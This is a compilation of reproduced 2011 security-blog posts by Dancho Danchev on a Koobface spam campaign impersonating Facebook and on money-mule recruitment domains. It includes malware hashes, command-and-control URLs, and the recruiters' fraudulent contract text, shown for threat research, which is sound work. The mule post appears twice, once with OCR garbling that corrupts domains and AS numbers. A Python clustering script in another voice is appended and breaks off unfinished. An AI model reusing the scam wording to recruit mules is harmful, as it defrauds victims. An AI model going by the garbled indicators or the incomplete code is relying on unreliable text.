8. http://ddanchev.blogspot.com/2010/04/dissecting-northwestern-banks-client.html

9. http://ddanchev.blogspot.com/2010/05/us-treasury-site-compromise-linked-to.html

10. http://ddanchev.blogspot.com/2010/05/torrentreactornet-serving-crimeware.html

11. http://ddanchev.blogspot.com/
Top Ten Must-Read Posts at ZDNet's Zero Day for 2010 (2011-01-22 12:06)

01. [1] Seven myths about zero day vulnerabilities debunked

02. [2] Should a targeted country strike back at the cyber attackers?

03. [3] 5 reasons why the proposed ID scheme for Internet users is a bad idea

04. [4] Hotmail's new security features vs Gmail's old security features

05. [5] Attack of the Opt-In Botnets

06. [6] From Russia with (objective) spam stats

07. [7] The current state of the crimeware threat - Q&A

08. [8] Mac OS X SMS ransomware - hype or real threat?

09. [9] 10 things you didn't know about the Koobface gang

10. [10] Google-China cyber espionage saga - FAQ

This post has been reproduced from [11] Dancho Danchev's blog.

1. http://www.zdnet.com/blog/security/seven-myths-about-zero-day-vulnerabilities-debunked/7026

2. http://www.zdnet.com/blog/security/should-a-targeted-country-strike-back-at-the-cyber-attackers/6194

3. http://www.zdnet.com/blog/security/5-reasons-why-the-proposed-id-scheme-for-internet-users-is-a-bad-idea/6527

4. http://www.zdnet.com/blog/security/hotmails-new-security-features-vs-gmails-old-security-features/6509

5. http://www.zdnet.com/blog/security/attack-of-the-opt-in-botnets/6268

6. http://www.zdnet.com/blog/security/from-russia-with-objective-spam-stats/5813

7. http://www.zdnet.com/blog/security/the-current-state-of-the-crimeware-threat-q-a/5797

8. http://www.zdnet.com/blog/security/mac-os-x-sms-ransomware-hype-or-real-threat/5731

9. http://www.zdnet.com/blog/security/10-things-you-didnt-know-about-the-koobface-gang/5452

10. http://www.zdnet.com/blog/security/google-china-cyber-espionage-saga-faq/5259

11. http://ddanchev.blogspot.com/
Spamvertised "Your password has been stolen!" Malware Campaign Circulating (2011-01-26 20:30)

A currently ongoing spamvertised campaign attempts to impersonate the most popular social networking site, Facebook.

Using a well-proven "Your password has been stolen!" theme, the campaign entices the end user into downloading and executing the malware. Social engineering-driven campaigns targeting Facebook remain among the popular malware campaign spreading techniques due to the ease of execution.

Subject: Facebook Support. Your password has been stolen! ID50888

Message: Good afternoon.

A Spam is sent from your FaceBook account.

Your password has been changed for safety. Information regarding your account and a new password is attached to the letter.Read this information thoroughly and change the password to complicated one. Please do not reply to this email, it's automatic mail notification! Thank you for your attention. Your Facebook!

Spamvertised filename: Facebook details_ID76803.zip (32,458 bytes)

Detection rate:

Facebook_details.exe - [1] Trojan-Downloader:W32/Koobface.HV - 12/43 (27.9 %)

MD5: f0e7a8c264fe14562ca8ac98abb35840
SHA1: f68d15e66590c69ac75c46a09ae495be8bbf231f
SHA256: 3ca757bfdecbee20ec10d5af770700041f4bc1b17ee3123f4d85acfd19e1bb74

Upon execution, the sample phones back to:

interviewbuy.ru /forum/document.doc
interviewbuy.ru /forum/load.php?file=0
interviewbuy.ru /forum/load.php?file=1
interviewbuy.ru /forum/load.php?file=2
interviewbuy.ru /forum/load.php?file=3
interviewbuy.ru /forum/load.php?file=4
interviewbuy.ru /forum/load.php?file=5
interviewbuy.ru /forum/load.php?file=6
interviewbuy.ru /forum/load.php?file=7
interviewbuy.ru /forum/load.php?file=8
interviewbuy.ru /forum/load.php?file=9
interviewbuy.ru /forum/load.php?file=ftpgrabber
interviewbuy.ru /forum/load.php?file=pokergrabber

interviewbuy.ru - 91.204.48.96 (AS24965); 124.217.248.229 (AS45839) Email: servman1976@yandex.ru

ZeuS crimeware activity at [2] AS24965 (SPOINT-AS S.Point LTD) as well as [3] SpyEye malicious activity is also observed.

This post has been reproduced from [4] Dancho Danchev's blog.

1. http://www.virustotal.com/file-scan/report.html?id=3ca757bfdecbee20ec10d5af770700041f4bc1b17ee3123f4d85acfd19e1bb74-1296061852

2. https://zeustracker.abuse.ch/monitor.php?as=24965

3. https://spyeyetracker.abuse.ch/monitor.php?as=24965

4. http://ddanchev.blogspot.com/
Keeping Money Mule Recruiters on a Short Leash - Part Five (2011-01-31 12:58)

With money mule recruitment continuing to represent the most actively used risk-forwarding tactic within the cybercrime ecosystem for the purpose of securely distributing fraudulently obtained funds, part five of the "[1] Keeping Money Mule Recruiters on a Short Leash" series is here to stay.

What's particularly interesting about the money mule recruitment domain portfolio that I'll expose is the logical progression from bogus companies offering financial services to a diverse set of companies occupying multiple markets/covering different market segments.

- Current trends - Localization and standardization/template-ization

A great example of this trend - largely driven by the [2] standardization and template-ization of money mule recruitment sites as a service - is Schwartz & Brothers LLC (schwartz-brothers.cc).

"Schwartz & Brothers LLC is the first choice for artists and buyers alike! Schwartz & Brothers LLC is an effective tool for the artist and emerging artist to market and promote their art in a professional and inexpensive manner.

We will market your art to the international community of art buyers. Whether you are looking to buy or sell original art, Schwartz & Brothers LLC is the premier art site for those seeking to buy or sell original art online."

From financial services to an entirely new market segment, whereas the entire recruitment process remains pretty static, excluding several quality-assurance-oriented details. For instance, every potential mule is required to download an entry-level job psychological test, which surprisingly asks directly whether the mule is from Australia, next to automatically choosing Australia as the country of origin at a later stage of the registration process.

Moreover, in the context of quality assurance, the recruiters also ask the applicant "Are you/were you convicted?" in an attempt to combine the survey results with other details such as the opening date of the bank account, as well as the average daily/weekly/monthly amount transferred.

- The Terms of Service
"DUTIES:

The Contractor undertakes the responsibility to receive payments from the Clients of the Company to his personal bank account, withdraw cash and to process payments to the Company's partners by Western Union or MoneyGram money transfer system within one (1) day. He/she will report directly to the senior manager and to any other party designated by the senior manager in connection with the performance of the duties under this Agreement and shall fulfill any other duties reasonably requested by the Company and agreed to by the Contractor.

CONFIDENTIALITY:

The Contractor acknowledges that during the engagement he will have access to and become acquainted with various trade secrets, inventions, innovations, processes, information, records and specifications owned or licensed by the Company and/or used by the Company in connection with the operation of its business including, without limitation, the Company's business and product processes, methods, customer lists, accounts and procedures.

The Contractor agrees that he will not disclose any of the aforesaid, directly or indirectly, or use any of them in any manner, either during the term of this Agreement or at any time thereafter. All files, records, documents, blueprints, specifications, information, letters, notes, media lists, original artwork/creative, notebooks, and similar items relating to the business of the Company, whether prepared by the Contractor or otherwise coming into his possession, shall remain the exclusive property of the Company.

The Contractor shall not retain any copies of the foregoing without the Company's prior written permission.

The Contractor further agrees that he will not disclose his retention as an independent contractor or the terms of this Agreement to any person without the prior written consent of the Company and shall at all times preserve the confidential nature of his relationship to the Company and of the services hereunder.

If the Contractor releases any of the above information to any parties outside of this company, such as personal friend, close relatives or other Financial Institutions such as a Bank or other Financial Firms, such could be considered grounds for immediate termination. If the Contractor is ever in doubt of what information can be released and when, the Contractor will contact their superior right away.

TERMS OF ENGAGEMENT:

The Contractor is engaged by the Company on terms of thirty-days (30) probationary period. During the probationary period the Company undertakes to pay to the Contractor the base salary amounting to AUD 2300 per month plus 8 % commission from each payment processing operation. After the probationary period the Company agrees to revise and raise the base salary to 3000 USD. The Company has the right to cancel this Agreement at any time within the probationary period or refuse to extend it after that, should the Contractor refuse to fulfill his/her obligations under this Agreement or fulfills them not
in good faith. The Contractor has the right to terminate the 
Agreement at any time on condition that he/she has 
processed all previous payments and has no new 
instructions. 



COMPENSATION: 


The Company undertakes to pay taxes accrued in 
connection with money transfer. The Company shall also 
reimburse part of expenses which are incurred in 
connection with money transfer by Western Union or 
MoneyGram systems 

(should money transfer charges exceed 3 %, i.e. 
commission for payment processing operation). The above 
difference will be automatically added to the base salary of 
the Contractor and paid once per month together with the 
base salary. 

The Company shall have the right to decrease the 
Contractor's commission in case the payment processing 

terms were violated by the Contractor. Should the 
Contractor delays re-sending money accepted to his bank 
account for the period exceeding one (1) day without any 
explicit reason, the Company shall have the right to impose 
sanctions on the Contractor if only the delay has not been 
caused by the Force Majeur circumstances and to apply to 
the arbitration and claim for the reimburse of the amount 
transferred to his account or for compensation for other 
damage if any, evicted due to the delay. 

The Contractor may take days off at any time and at his/her 
option upon giving five (5) working days advance 

notice in writing or three (3) working days advance notice 
via e-mail or fax to the Company in order that the latter 
may abstain from charging the Contractor with new 
instructions. However, salary for each day-off is deducted 
from the Contractor's base salary. " 

- OSINT data for money mule recruitment sites 



The following portfolio of money mule recruitment domains 
appears to have been registered using automated email 

registration tools, with the potential for [3]CAPTCHA 
outsourcing clearly considered by the malicious parties, 
taking into consideration the even decreasing price for 
solving CAPTCHA challenges. 

4STAR-SOLUTIONS.CC - Email: urge@bz3.ru 

ACOON-GROUPLLC.CC - Email: bombay@yourisp.ru 

ACOONGROUP-LLC.CO - Email: jx@ppmail.ru 

AIMIC-GROUPLLC.CC - 98.141.220.118 - Email: 
aryan@ppmail. ru 

AMINA-GROUPCO.CO - Email: beige@ca4.ru 
AMINA-GROUPINC.CC - Email: zowie@yourisp.ru 
AMINAORG.CC - Email: range@ppmail.ru 
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ARPHIS-GOLDGROUP.CC - Email: rook@ca4.ru 
ARPHIS-GOLDGROUP.CC - Email: rook@ca4.ru 
ARPHISGOLDGROUP-INC. CO Email: ira@bz3.ru 
AUS-FINANCE.ee - Email: ours@ca4.ru 
BREDGAR-GROUPLLC.CC - Email: zoe@ca4.ru 
BREDGARGROUP-LLC.CO - Email: judo@free-id.ru 


CESIS-GROUPLLC.CC - Email: el@cheapbox.ru 
CESISGROUP-LLC.CC - Email: fiip@free-id.ru 
CESIS-GROUPLLC.CO - Email: our@ca4.ru 
COCOONGROUP-LLC.HK - Email: most@cheapbox.ru 
CORES-GROUP.CC - Email: jaunt@cheapbox.ru 
CORESGROUP-INC.CO - Email: yule@cheapbox.ru 
CORES-GROUPLTD.CO - Email: Iiszt@bz3.ru 
CRAFT-GROUPNET.CC - Email: room@yourisp.ru 
DILIGENCE-GROUP. CO - Email: twig@ppmail.ru 
DILIGENCE-GROUPINC.CC - Email: till@cheapbox.ru 
DUNCROFT-GROUP-INC.CC - Email: swiss@ca4.ru 
DUNCROFTGROUP-INC.CO - Email: shoot@ppmail.ru 
ELSDEN-GROUPINC.HK - Email: lost@ppmail.ru 
FARLINE-FIN.CO - Email: pecks@free-id.ru 
FARLINE-FININC.CC - Email: cynic@free-id.ru 
FILEGROUP-LLC.CO - Email: knelt@ca4.ru 
FtNTEC-LTD.ee - Email: w@yourisp.ru 
FINTEC-UK.CO - Email: sons@bz3.ru 
GLEICHFALLS-GROUPINC. CO - Email: tents@ppmaU. 
I-COM PASS-GROUP. CO - Email: wolf@ca4.ru 



IM-SYSCROUP.CO - Email: truce@free-id.ru 
IMSYSTEMS-GROUP.CC - Email: agate@bz3.ru 
INCOGROUP-USA.CO - Email: beams@free-id.ru 

JOURNEY-FINANCIAL. CC - Email: Iulu@ca4.ru 
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LBMGROUPCO.CC - Email: dreamy@ppmail.ru 
LBM-GROUPINC.CO - Email: coma@ca4.ru 
LCD-FIN.CO - Email: salt@free-id.ru 
LCD-FINANCE.CC - Email: fritz@bz3.ru 
MACROTECHINC.CC - Email: cv@yourisp.ru 
MACROTECH-UK.CO - Email: curl@cheapbox.ru 
MALLOW-GROUP.CC - Email: cues@ppmail.ru 
MALLOW-GROUPINC.CO - Email: hn@bz3.ru 
MONEY-VISUALUK.CC - Email: hn@bz3.ru 
MONEYVISUAL-LLC.CO - Email: yam@free-id.ru 
MARFYGROUP.CC - Email: thorny@cheapbox.ru 
MICHAELESGROUP-USA.CO - Email: knelt@ca4.ru 
OLIVER-SONSINC.CC - Email: drub@cheapbox.ru 
ONLINE-SOLUTIONSLLC.CC - Email: coma@ca4.ru 
PEGASLTDUNION.ee - Email: prim@bz3.ru 



PHYSIS-GROUPLLC.CC - Email: tt@ca4.ru 
PHYSISGROUP-LLC.CO - Email: opals@free-id.ru 
PINFOLD-GROUPINC.CO - Email: beams@free-id.ru 
RADIUM-GROUP.CC - Email: spy@yourisp.ru 
RADIUMUK-LTD.CC - Email: socks@cheapbox.ru 
REDISCO-GROUPINC.HK - Email: wimp@ca4.ru 
SANTORINI-FIN.CC - Email: gill@cheapbox.ru 
SANTORINI-FINANCE.CO - Email: foul@yourisp.ru 
SCHNELLER-GROUPINC.CO - Email: foul@yourisp.ru 
SCHWARTZ-BROTHERS.ee - Email: oozed@bz3.ru 
SILVERSUNGROUP-INC.CC - Email: cp@ca4.ru 
SILVERSUN-GROUPUK.CO - Email: cheer@ca4.ru 
SOLUTIONSLTD.ee - Email: h2o@ca4.ru 
STILE-GROUPLLC.CC - Email: ma@free-id.ru 
SUNRISEPR-GROUPLTD.ee - Email: cough@ppmail.ru 
TECHADVINC.CC - Email: chance@cheapbox.ru 
TECHADV-tNC.CC - Email: chance@cheapbox.ru 
TECHOUSE-GROUP.CC - Email: scale@yourisp.ru 
UKTECH-GROUPLLC.CC - Email: cap@ca4.ru 
USGROUP-AMINA.CO - Email: cap@ca4.ru 



USGROUP-REIGN.CO - Email: w@ppmail.ru 
YESGROUP-LLC.CO - Email: twig@ppmaii.ru 
Name servers of notice: 

NS1.LIBUNITAU.CC - 178.162.152.76 (AS28753) - Email: 
ached@yourisp. ru 

NSl.NNSQUE.CC - Email: amok@cheapbox.ru 

NSl.OUVAU.ee - Email: bop@cheapbox.ru 

NSl.PAGEREDNS.CC - 178.162.152.77 (A528753) - Email: 
freer@free-id. ru 

NSl.SURPLUSUSA.CC - 209.159.156.162 (A519318) - 
Email: skulk@ppmail.ru 

NSl.TVSILVAU.CC - Email: fact@ppmail.ru 

NSl.UKNSSPACE.CC - 69.10.44.190 (A519318) - Email: 
gravy@ca4.ru 

nsl.uksource.ee - 69.10.44.189 (AS 19318) - Email: 
liver@cheapbox. ru 

NSl.USABONDS.CC - Email: bart@cheapbox.ru 

NS2.AUSTDEC.CC - 66.199.236.114 (AS15149) - Email: 
bold@yourisp. ru 

NS2.COUKSNS.ee - 122.70.148.179 (AS55462) - Email: 
preen@ppmail. ru 
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ns2.gbtrade.cc - 66.199.236.114 (A515149) - Email: 
ct@yourisp.ru 

NS2.OUVAU.CC - Email: bop@cheapbox.ru 

NS2.RINGTONS.ee - 66.199.236.115 (AS 15149) - Email: 
aaron@cheapbox. ru 

NS2.TVSILVAU.CC - Email: fact@ppmail.ru 

NS2.USAFUNDS.CC - 76.73.47.28 (AS30058) - Email: 
tile@yourisp.ru 

NS2.ZONENSUK.CC -178.162.181.11 (AS28753) - Email: 
rooms@ppmail. ru 

NS3.AUSTDEC.CC -178.162.181.11 (AS28753) - Email: 
bold@yourisp. ru 

NS3.FOLOWDNS.CC -178.162.181.11 (AS28753) - Email: 
dyed@bz3.ru 

NS3.SDNSAU.CC - Email: level@cheapbox.ru 

NS3.SURPLUSUSA.CC - 69.50.192.97 (AS18866) - Email: 
skulk@ppmail. ru 

NS3.TVSILVAU.CC - Email: fact@ppmail.ru 

NS3.UKCCONS.ee -178.162.181.11 (AS28753) - Email: 
ted@cheapbox. ru 

NS3.UKDNS.CC - 66.199.236.116 (AS 15149) - Email: 
append@free-id. ru 

ns3.ukearnings.ee -178.162.181.11 (AS28753) - Email: 
bf@free-id.ru 



ASs of notice using standart nsl;ns2; ns3 structure: 

AS28753 - NETDIRECTAS NETDIRECT Frankfurt, DE 

AS19318 - NJIIX-1 NJUX.net HOB Meadowlands Pkwy 
Secaucus, NJ 07094 +1.201.605.1425 

AS28753 - NETDIRECTAS NETDIRECT Frankfurt, DE 

AS 15149 - EZZI-101-BGP EZZI 

- Long term trends - "from mule inventory to 
transactions inventory" 

With the [4]localization and standardization/template- 
tization of the entire money mule recruitment 
process an every day's reality, quality assurance and 
diversification of the markets/market segments in order to 
increase the probability of successful social engineering 
attack, will start taking place. Moreover, the current 
template driven recruitment ecosystem will inevitably start 
taking advantage of basic concepts such as geolocation and 
content 

cloaking, in order to once again increase the probability for 
converting a web site visitor into a mule. 

At an invite-only conference that I attended in September, 
2010, someone from the audience asked me a 

rather interesting question. Does it really matter how many 
mules are recruited by a particular syndicate, and most 
importantly, can we talk about average number of 
days/weeks/hours by the time the mule gets busted, and 
can no 


longer offer his/her services? 



In the long term, we're inevitably going to witness the 
migration from building inventories of mules to transaction- 
driven mule recruitment model where the capability-driven 
mentality surpasses the mule inventory building one. 

The number of possible transactions with success rates 
based on historical performance, combined with an infinite 
loop of recruitment is what will drive the entire mule 
recruitment ecosystem. 

Related posts: 

[5] The DNS Infrastructure of the Money Mule Recruitment 
Ecosystem 

[6] Keeping Money Mule Recruiters on a Short Leash - Part 
Four 

[7] Money Mule Recruitment Campaign Serving Client-Side 
Exploits 

[8] Keeping Money Mule Recruiters on a Short Leash - Part 
Three 

[9] Money Mule Recruiters on Yahoo! 's Web Hosting 

[lOJDissecting an Ongoing Money Mule Recruitment 
Campaign 

[11] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

[12] Keeping Reshipping Mule Recruiters on a Short Leash 

[13] Keeping Money Mule Recruiters on a Short Leash 

[14] Standardizing the Money Mule Recruitment Process 



[15] Inside a Money Laundering Group's Spamming 
Operations 
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[16] Money Mule Recruiters use ASProx's Fast Fluxing 
Services 

[17] Money Mules Syndicate Actively Recruiting Since 2002 

This post has been reproduced from [18]Dancho Danchev's 
blog. 
Keeping Money Mule Recruiters on a Short Leash - Part Five (2011-01-31 12:58)

With money mule recruitment continuing to represent the most actively used risk-forwarding tactic within the cybercrime ecosystem for the purpose of securely distributing fraudulently obtained funds, part five of the "[1]Keeping Money Mule Recruiters on a Short Leash" series is here to stay.

What's particularly interesting about the money mule recruitment domain portfolio that I'll expose is the logical progression from bogus companies offering financial services to a diverse set of companies occupying multiple markets/covering different market segments.

- Current trends - Localization and standardization/template-tization

A great example of this trend - largely driven by the [2]standardization and template-zation of money mule recruitment sites as a service - is Schwartz & Brothers LLC (schwartz-brothers.cc).

" Schwartz & Brothers LLC is the first choice for artists and buyers alike! Schwartz & Brothers LLC is an effective tool for the artist and emerging artist to market and promote their art in a professional and inexpensive manner.

We will market your art to the international community of art buyers. Whether you are looking to buy or sell original art, Schwartz & Brothers LLC is the premier art site for those seeking to buy or sell original art online. "
From financial services to an entirely new market segment, while the entire recruitment process remains pretty much static, excluding several quality-assurance-oriented details. For instance, every potential mule is required to download an entry-level job psychological test, which surprisingly asks directly whether the mule is from Australia, next to automatically choosing Australia as the country of origin at a later stage of the registration process.

Moreover, in the context of quality assurance, the recruiters also ask the applicant "Are you/were you convicted?" in an attempt to combine the survey results with other details such as the opening date of the bank account, as well as the average daily/weekly/monthly amount transferred.

- The Terms of Service
" DUTIES:

The Contractor undertakes the responsibility to receive payments from the Clients of the Company to his personal bank account, withdraw cash and to process payments to the Company's partners by Western Union or MoneyGram money transfer system within one (1) day. He/she will report directly to the senior manager and to any other party designated by the senior manager in connection with the performance of the duties under this Agreement and shall fulfill any other duties reasonably requested by the Company and agreed to by the Contractor.

CONFIDENTIALITY:

The Contractor acknowledges that during the engagement he will have access to and become acquainted with various trade secrets, inventions, innovations, processes, information, records and specifications owned or licensed by the Company and/or used by the Company in connection with the operation of its business including, without limitation, the Company's business and product processes, methods, customer lists, accounts and procedures.

The Contractor agrees that he will not disclose any of the aforesaid, directly or indirectly, or use any of them in any manner, either during the term of this Agreement or at any time thereafter. All files, records, documents, blueprints, specifications, information, letters, notes, media lists, original artwork/creative, notebooks, and similar items relating to the business of the Company, whether prepared by the Contractor or otherwise coming into his possession, shall remain the exclusive property of the Company. The Contractor shall not retain any copies of the foregoing without the Company's prior written permission.

The Contractor further agrees that he will not disclose his retention as an independent contractor or the terms of this Agreement to any person without the prior written consent of the Company and shall at all times preserve the confidential nature of his relationship to the Company and of the services hereunder.

If the Contractor releases any of the above information to any parties outside of this company, such as personal friend, close relatives or other Financial Institutions such as a Bank or other Financial Firms, such could be considered grounds for immediate termination. If the Contractor is ever in doubt of what information can be released and when, the Contractor will contact their superior right away.

TERMS OF ENGAGEMENT:

The Contractor is engaged by the Company on terms of thirty-days (30) probationary period. During the probationary period the Company undertakes to pay to the Contractor the base salary amounting to AUD 2300 per month plus 8 % commission from each payment processing operation. After the probationary period the Company agrees to revise and raise the base salary to 3000 USD. The Company has the right to cancel this Agreement at any time within the probationary period or refuse to extend it after that, should the Contractor refuse to fulfill his/her obligations under this Agreement or fulfills them not in good faith. The Contractor has the right to terminate the Agreement at any time on condition that he/she has processed all previous payments and has no new instructions.

COMPENSATION:

The Company undertakes to pay taxes accrued in connection with money transfer. The Company shall also reimburse part of expenses which are incurred in connection with money transfer by Western Union or MoneyGram systems (should money transfer charges exceed 3 %, i.e. commission for payment processing operation). The above difference will be automatically added to the base salary of the Contractor and paid once per month together with the base salary.

The Company shall have the right to decrease the Contractor's commission in case the payment processing terms were violated by the Contractor. Should the Contractor delay re-sending money accepted to his bank account for the period exceeding one (1) day without any explicit reason, the Company shall have the right to impose sanctions on the Contractor if only the delay has not been caused by the Force Majeure circumstances and to apply to the arbitration and claim for the reimbursement of the amount transferred to his account or for compensation for other damage if any, evicted due to the delay.

The Contractor may take days off at any time and at his/her option upon giving five (5) working days advance notice in writing or three (3) working days advance notice via e-mail or fax to the Company in order that the latter may abstain from charging the Contractor with new instructions. However, salary for each day-off is deducted from the Contractor's base salary. "

- OSINT data for money mule recruitment sites 

The following portfolio of money mule recruitment domains appears to have been registered using automated email registration tools, with the potential for [3]CAPTCHA outsourcing clearly considered by the malicious parties, given the ever decreasing price for solving CAPTCHA challenges.

4STAR-SOLUTIONS.CC - Email: urge@bz3.ru
ACOON-GROUPLLC.CC - Email: bombay@yourisp.ru
ACOONGROUP-LLC.CO - Email: jx@ppmail.ru
AIMIC-GROUPLLC.CC - 98.141.220.118 - Email: aryan@ppmail.ru
AMINA-GROUPCO.CO - Email: beige@ca4.ru
AMINA-GROUPINC.CC - Email: zowie@yourisp.ru
AMINAORG.CC - Email: range@ppmail.ru
ARPHIS-GOLDGROUP.CC - Email: rook@ca4.ru
ARPHISGOLDGROUP-INC.CO - Email: ira@bz3.ru
AUS-FINANCE.CC - Email: ours@ca4.ru
BREDGAR-GROUPLLC.CC - Email: zoe@ca4.ru
BREDGARGROUP-LLC.CO - Email: judo@free-id.ru
CESIS-GROUPLLC.CC - Email: el@cheapbox.ru
CESISGROUP-LLC.CC - Email: flip@free-id.ru
CESIS-GROUPLLC.CO - Email: our@ca4.ru
COCOONGROUP-LLC.HK - Email: most@cheapbox.ru
CORES-GROUP.CC - Email: jaunt@cheapbox.ru
CORESGROUP-INC.CO - Email: yule@cheapbox.ru
CORES-GROUPLTD.CO - Email: liszt@bz3.ru
CRAFT-GROUPNET.CC - Email: room@yourisp.ru
DILIGENCE-GROUP.CO - Email: twig@ppmail.ru
DILIGENCE-GROUPINC.CC - Email: till@cheapbox.ru
DUNCROFT-GROUP-INC.CC - Email: swiss@ca4.ru
DUNCROFTGROUP-INC.CO - Email: shoot@ppmail.ru
ELSDEN-GROUPINC.HK - Email: lost@ppmail.ru
FARLINE-FIN.CO - Email: pecks@free-id.ru
FARLINE-FININC.CC - Email: cynic@free-id.ru
FILEGROUP-LLC.CO - Email: knelt@ca4.ru
FINTEC-LTD.CC - Email: w@yourisp.ru
FINTEC-UK.CO - Email: sons@bz3.ru
GLEICHFALLS-GROUPINC.CO - Email: tents@ppmail.
I-COMPASS-GROUP.CO - Email: wolf@ca4.ru
IM-SYSGROUP.CO - Email: truce@free-id.ru
IMSYSTEMS-GROUP.CC - Email: agate@bz3.ru
INCOGROUP-USA.CO - Email: beams@free-id.ru
JOURNEY-FINANCIAL.CC - Email: lulu@ca4.ru
LBMGROUPCO.CC - Email: dreamy@ppmail.ru
LBM-GROUPINC.CO - Email: coma@ca4.ru
LCD-FIN.CO - Email: salt@free-id.ru
LCD-FINANCE.CC - Email: fritz@bz3.ru
MACROTECHINC.CC - Email: cv@yourisp.ru
MACROTECH-UK.CO - Email: curl@cheapbox.ru
MALLOW-GROUP.CC - Email: cues@ppmail.ru
MALLOW-GROUPINC.CO - Email: hn@bz3.ru
MONEY-VISUALUK.CC - Email: hn@bz3.ru
MONEYVISUAL-LLC.CO - Email: yam@free-id.ru
MARFYGROUP.CC - Email: thorny@cheapbox.ru
MICHAELESGROUP-USA.CO - Email: knelt@ca4.ru
OLIVER-SONSINC.CC - Email: drub@cheapbox.ru
ONLINE-SOLUTIONSLLC.CC - Email: coma@ca4.ru
PEGASLTDUNION.CC - Email: prim@bz3.ru
PHYSIS-GROUPLLC.CC - Email: tt@ca4.ru
PHYSISGROUP-LLC.CO - Email: opals@free-id.ru
PINFOLD-GROUPINC.CO - Email: beams@free-id.ru
RADIUM-GROUP.CC - Email: spy@yourisp.ru
RADIUMUK-LTD.CC - Email: socks@cheapbox.ru
REDISCO-GROUPINC.HK - Email: wimp@ca4.ru
SANTORINI-FIN.CC - Email: gill@cheapbox.ru
SANTORINI-FINANCE.CO - Email: foul@yourisp.ru
SCHNELLER-GROUPINC.CO - Email: foul@yourisp.ru
SCHWARTZ-BROTHERS.CC - Email: oozed@bz3.ru
SILVERSUNGROUP-INC.CC - Email: cp@ca4.ru
SILVERSUN-GROUPUK.CO - Email: cheer@ca4.ru
SOLUTIONSLTD.CC - Email: h2o@ca4.ru
STILE-GROUPLLC.CC - Email: ma@free-id.ru
SUNRISEPR-GROUPLTD.CC - Email: cough@ppmail.ru
TECHADVINC.CC - Email: chance@cheapbox.ru
TECHADV-INC.CC - Email: chance@cheapbox.ru
TECHOUSE-GROUP.CC - Email: scale@yourisp.ru
UKTECH-GROUPLLC.CC - Email: cap@ca4.ru
USGROUP-AMINA.CO - Email: cap@ca4.ru
USGROUP-REIGN.CO - Email: w@ppmail.ru
YESGROUP-LLC.CO - Email: twig@ppmail.ru

Name servers of notice: 


NS1.LIBUNITAU.CC - 178.162.152.76 (AS28753) - Email: ached@yourisp.ru
NS1.NNSQUE.CC - Email: amok@cheapbox.ru
NS1.OLIVAU.CC - Email: bop@cheapbox.ru
NS1.PAGEREDNS.CC - 178.162.152.77 (AS28753) - Email: freer@free-id.ru
NS1.SURPLUSUSA.CC - 209.159.156.162 (AS19318) - Email: skulk@ppmail.ru
NS1.TVSILVAU.CC - Email: fact@ppmail.ru
NS1.UKNSSPACE.CC - 69.10.44.190 (AS19318) - Email: gravy@ca4.ru
ns1.uksource.cc - 69.10.44.189 (AS19318) - Email: liver@cheapbox.ru
NS1.USABONDS.CC - Email: bart@cheapbox.ru
NS2.AUSTDEC.CC - 66.199.236.114 (AS15149) - Email: bold@yourisp.ru
NS2.COUKSNS.CC - 122.70.148.179 (AS55462) - Email: preen@ppmail.ru
ns2.gbtrade.cc - 66.199.236.114 (AS15149) - Email: ct@yourisp.ru
NS2.OLIVAU.CC - Email: bop@cheapbox.ru
NS2.RINGTONS.CC - 66.199.236.115 (AS15149) - Email: aaron@cheapbox.ru
NS2.TVSILVAU.CC - Email: fact@ppmail.ru
NS2.USAFUNDS.CC - 76.73.47.28 (AS30058) - Email: tile@yourisp.ru
NS2.ZONENSUK.CC - 178.162.181.11 (AS28753) - Email: rooms@ppmail.ru
NS3.AUSTDEC.CC - 178.162.181.11 (AS28753) - Email: bold@yourisp.ru
NS3.FOLOWDNS.CC - 178.162.181.11 (AS28753) - Email: dyed@bz3.ru
NS3.SDNSAU.CC - Email: level@cheapbox.ru
NS3.SURPLUSUSA.CC - 69.50.192.97 (AS18866) - Email: skulk@ppmail.ru
NS3.TVSILVAU.CC - Email: fact@ppmail.ru
NS3.UKCCONS.CC - 178.162.181.11 (AS28753) - Email: ted@cheapbox.ru
NS3.UKDNS.CC - 66.199.236.116 (AS15149) - Email: append@free-id.ru
ns3.ukearnings.cc - 178.162.181.11 (AS28753) - Email: bf@free-id.ru

ASs of notice using the standard ns1; ns2; ns3 structure:

AS28753 - NETDIRECTAS NETDIRECT Frankfurt, DE

AS19318 - NJIIX-1 NJIIX.net HOB Meadowlands Pkwy Secaucus, NJ 07094 +1.201.605.1425

AS15149 - EZZI-101-BGP EZZI
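The registrant e-mails, hosting IPs and AS numbers listed above are exactly what a defender pivots on to tie such a portfolio together: hosts that share a registrant address or a hosting IP are very likely under one operator's control, and a spread of dictionary-word addresses across a handful of throwaway mail providers is the fingerprint of the automated account registration the post refers to. The following Python script is an added example, not the author's tooling: it parses the post's own "HOST - [IP] [(ASnnn)] - Email: address" list layout (the sample records are copied from the lists above), pivots on shared e-mail, IP and AS, and clusters hosts into connected components with a union-find. The function and field names are my own.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: a handful of records copied from the post's OSINT lists,
# in the "HOST - [IP] [(ASnnn)] - Email: address" layout the post uses.
SAMPLE = """\
4STAR-SOLUTIONS.CC - Email: urge@bz3.ru
AIMIC-GROUPLLC.CC - 98.141.220.118 - Email: aryan@ppmail.ru
ARPHIS-GOLDGROUP.CC - Email: rook@ca4.ru
TECHADVINC.CC - Email: chance@cheapbox.ru
TECHADV-INC.CC - Email: chance@cheapbox.ru
UKTECH-GROUPLLC.CC - Email: cap@ca4.ru
USGROUP-AMINA.CO - Email: cap@ca4.ru
NS1.LIBUNITAU.CC - 178.162.152.76 (AS28753) - Email: ached@yourisp.ru
NS2.ZONENSUK.CC - 178.162.181.11 (AS28753) - Email: rooms@ppmail.ru
NS3.AUSTDEC.CC - 178.162.181.11 (AS28753) - Email: bold@yourisp.ru
NS2.AUSTDEC.CC - 66.199.236.114 (AS15149) - Email: bold@yourisp.ru
ns2.gbtrade.cc - 66.199.236.114 (AS15149) - Email: ct@yourisp.ru
NS1.SURPLUSUSA.CC - 209.159.156.162 (AS19318) - Email: skulk@ppmail.ru
"""

LINE_RE = re.compile(
    r"^(?P<host>[A-Za-z0-9.-]+)"                       # domain or name server
    r"(?:\s*-\s*(?P<ip>\d{1,3}(?:\.\d{1,3}){3}))?"     # optional hosting IP
    r"(?:\s*\((?P<asn>AS\d+)\))?"                      # optional AS number
    r"\s*-\s*Email:\s*(?P<email>[^\s@]+@[^\s@]+)\s*$"  # registrant e-mail
)


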